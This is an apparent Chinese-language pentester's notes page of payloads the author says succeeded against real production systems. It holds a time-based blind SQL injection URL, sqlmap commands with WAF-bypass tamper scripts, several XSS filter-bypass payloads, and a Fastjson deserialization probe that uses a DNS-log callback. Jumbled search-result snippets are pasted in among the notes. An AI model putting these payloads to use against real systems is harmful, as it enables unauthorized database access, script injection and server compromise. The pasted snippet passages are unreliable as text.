前言

//记录真实系统中成功过的小tips，毕竟靶场和生产环境相差还是很大的，**读万卷书不如行万里路**//

0x00、SQL

一次众测实战sql注入绕过　　SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现——ZAKER，个性化推荐热门新闻，本地权威媒体资讯http://app.myzaker.com/news/article.php?pk=6035b5af8e9f09165c74a1ccmysql rlike concat_时间盲注子查询与rlike_丧心病狂刘老湿的博客-CSDN博客sql注入首先尝试单引号;当单引号不报错的时候，尝试宽字节注入%df'(--tamper=unmagicquotes)1、时间盲注子查询(SELECT(SLEEP(5)))jHpaPayload: id=1 AND 4301=BENCHMARK(5000000,MD5(0x67426a42))2、rlike报错当使用正则匹配时，使用REGEXP和NOTREGEXP操作符(或RLIKE和NOTR...https://blog.csdn.net/weixin_29611737/article/details/113910368

一、系统中成功过的那些闭合

️http://ip/api/user/query?atSchoolStatus=&current_page=1&department=01'and(select*from(select+sleep(5))a+union+select+1)='&email=212&enabledStatus=&idCardNumber=&idCardType=

二、系统中成功过的那些sqlmap语句

//sql现在少的我都要怀疑我自己了

python sqlmap.py -r 1.txt --time-sec 8 --tamper=space2mysqlblank.py --batch --level 3 -p canshu

sqlmap -r xxx.txt --tamper=space2comment --level 3 --batch

0x01、XSS

系统中那些成功过的绕过姿势

1、文件附件

//ps：前端验证

️<img src=x οnerrοr=confirm(1)>.jpg

2、input标签

️”><img src=1 οnerrοr=alert(1)>

3、textarea标签

️unicode编码绕过：

</textarea><img src="x" οnerrοr="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;">

️

绕过姿势汇总

XSS总结ing_haoaaao的博客-CSDN博客xss姿势合集https://blog.csdn.net/haoaaao/article/details/125553450?spm=1001.2014.3001.5501

0x02、反序列化

1、Fastjson

//发送数据包中发现fastjson框架，进行尝试。

步骤：

（1）去https://dig.pm/上申请dns。

（2）payload：{ {"@type":"java.net.URL","val":"http://dns"}:"summer"}，替换payload里的dns，点击post发包。

（3）打开dig网站的“results”，有漏洞，results会有回显。